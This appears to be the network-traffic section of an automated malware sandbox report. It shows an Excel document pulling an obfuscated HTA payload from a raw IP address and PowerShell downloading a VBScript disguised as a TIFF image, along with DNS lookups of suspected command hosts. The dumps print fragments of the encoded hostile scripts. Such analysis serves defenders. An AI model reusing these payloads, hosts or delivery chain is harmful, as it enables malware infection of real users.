                                                                                                                                                                                                                  Oct 31, 2024 05:14:17.838762999 CET8.8.8.8192.168.2.220x8dadNo error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:32.660675049 CET8.8.8.8192.168.2.220x1c89No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.095896959 CET8.8.8.8192.168.2.220x4292No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:35.250314951 CET8.8.8.8192.168.2.220x5b5dNo error (0)seemebest2024rmc.duckdns.org107.175.130.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:36.287599087 CET8.8.8.8192.168.2.220xb4f9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.260034084 CET8.8.8.8192.168.2.220x5b5dNo error (0)seemebest2024rmc.duckdns.org107.175.130.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  • acesso.run
                                                                                                                                                                                                                  • drive.google.com
                                                                                                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                                                                                                  • 107.174.146.46
                                                                                                                                                                                                                  • geoplugin.net
                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  0192.168.2.2249162107.174.146.46803460C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.307064056 CET376OUTGET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: 107.174.146.46
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976300001 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:13:55 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                  Last-Modified: Wed, 30 Oct 2024 17:45:29 GMT
                                                                                                                                                                                                                  ETag: "33796-625b5448e34a0"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 210838
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: application/hta
                                                                                                                                                                                                                  Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 33 45 6d 25 32 35 32 35 33 44 25 32 35 32 35 32 37 25 32 35 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 2d 2d 25 32 35 32 35 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 35 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 35 32 35 32 38 25 32 35 32 35 32 35 32 32 25 32 35 32 35 32 35 32 35 33 43 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%2525253E%2525250A%2525253C%25252521--%2525250Adocument.write%25252528unescape%25252528%25252522%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CScript%2525252520LANGUAge%252525253D%2525252522VbscRIpT%2525252522%252525253E%252525250AdIM%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976330996 CET212INData Raw: 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                                                                                                                                                                  Data Ascii: 525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976352930 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30
                                                                                                                                                                                                                  Data Ascii: 252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%25252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976371050 CET1236INData Raw: 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                                                  Data Ascii: 09%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252525250
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976386070 CET1236INData Raw: 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35
                                                                                                                                                                                                                  Data Ascii: 525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%25
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976402044 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30
                                                                                                                                                                                                                  Data Ascii: 252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%25252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976418018 CET848INData Raw: 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                                                  Data Ascii: 09%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252525250
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976492882 CET1236INData Raw: 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                  Data Ascii: 9%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976509094 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32
                                                                                                                                                                                                                  Data Ascii: 25252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976524115 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25
                                                                                                                                                                                                                  Data Ascii: 2509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.981322050 CET1236INData Raw: 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                                                                  Data Ascii: %2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  1192.168.2.2249164107.174.146.46803720C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.279438972 CET453OUTGET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Range: bytes=8896-
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Host: 107.174.146.46
                                                                                                                                                                                                                  If-Range: "33796-625b5448e34a0"
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.940956116 CET1236INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:13:58 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                  Last-Modified: Wed, 30 Oct 2024 17:45:29 GMT
                                                                                                                                                                                                                  ETag: "33796-625b5448e34a0"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 201942
                                                                                                                                                                                                                  Content-Range: bytes 8896-210837/210838
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: application/hta
                                                                                                                                                                                                                  Data Raw: 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 52509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252525250
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.940973043 CET1236INData Raw: 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                  Data Ascii: 9%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.940995932 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32
                                                                                                                                                                                                                  Data Ascii: 25252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941025019 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39
                                                                                                                                                                                                                  Data Ascii: 52509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252525
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941035986 CET1236INData Raw: 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                  Data Ascii: 9%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941046953 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32
                                                                                                                                                                                                                  Data Ascii: 25252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941060066 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25
                                                                                                                                                                                                                  Data Ascii: 2509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941159964 CET36INData Raw: 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                                                  Data Ascii: %2525252509%2525252509%2525252509%25
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941170931 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32
                                                                                                                                                                                                                  Data Ascii: 25252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%252
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.941180944 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25
                                                                                                                                                                                                                  Data Ascii: 2509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509set%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525
                                                                                                                                                                                                                  Oct 31, 2024 05:13:58.946146011 CET1236INData Raw: 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                                                                                  Data Ascii: 509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%25252525


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  2192.168.2.2249165107.174.146.46803820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 31, 2024 05:14:04.793234110 CET373OUTGET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: 107.174.146.46
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.454925060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:05 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                  Last-Modified: Wed, 30 Oct 2024 17:59:16 GMT
                                                                                                                                                                                                                  ETag: "22c26-625b575ce6357"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 142374
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: image/tiff
                                                                                                                                                                                                                  Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 61 00 6c 00 6c 00 6f 00 63 00 68 00 69 00 72 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 61 00 6c 00 68 00 61 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 61 00 6c 00 68 00 61 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: private function CreateSession(wsman, conStr, optDic, allochiria) dim galhardamenteFlags dim conOpt dim galhardamente dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword galhardamenteFlags = 0
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.454947948 CET1236INData Raw: 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65
                                                                                                                                                                                                                  Data Ascii: proxyAccessType = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismV
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.454961061 CET424INData Raw: 00 65 00 6c 00 73 00 65 00 69 00 66 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 29 00 20 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d
                                                                                                                                                                                                                  Data Ascii: elseif LCase(encodingVal) = "utf-8" then galhardamenteFlags = galhardamenteFlags OR wsman.SessionFlagUTF8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.454973936 CET1236INData Raw: 00 67 00 20 00 66 00 6c 00 61 00 67 00 20 00 69 00 73 00 20 00 69 00 6e 00 76 00 61 00 6c 00 69 00 64 00 2e 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20
                                                                                                                                                                                                                  Data Ascii: g flag is invalid." end if end if if optDic.ArgumentExists(NPARA_UNENCRYPTED) then ASSERTBO
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.454986095 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 67 00 61 00 6c 00 68 00 61 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 67 00 61 00 6c 00 68 00 61 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65
                                                                                                                                                                                                                  Data Ascii: galhardamenteFlags = galhardamenteFlags OR wsman.SessionFlagUseSsl end if if optDic.ArgumentExists(N
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.455001116 CET424INData Raw: 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 6f 00 6e 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20
                                                                                                                                                                                                                  Data Ascii: tion is not valid for '-auth:none'" ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPA
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.455015898 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 55 00 73 00 65 00 20 00 2d 00 75 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 61 00 6e 00 64 00 20 00 2d 00 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 2e 00 20 00 20
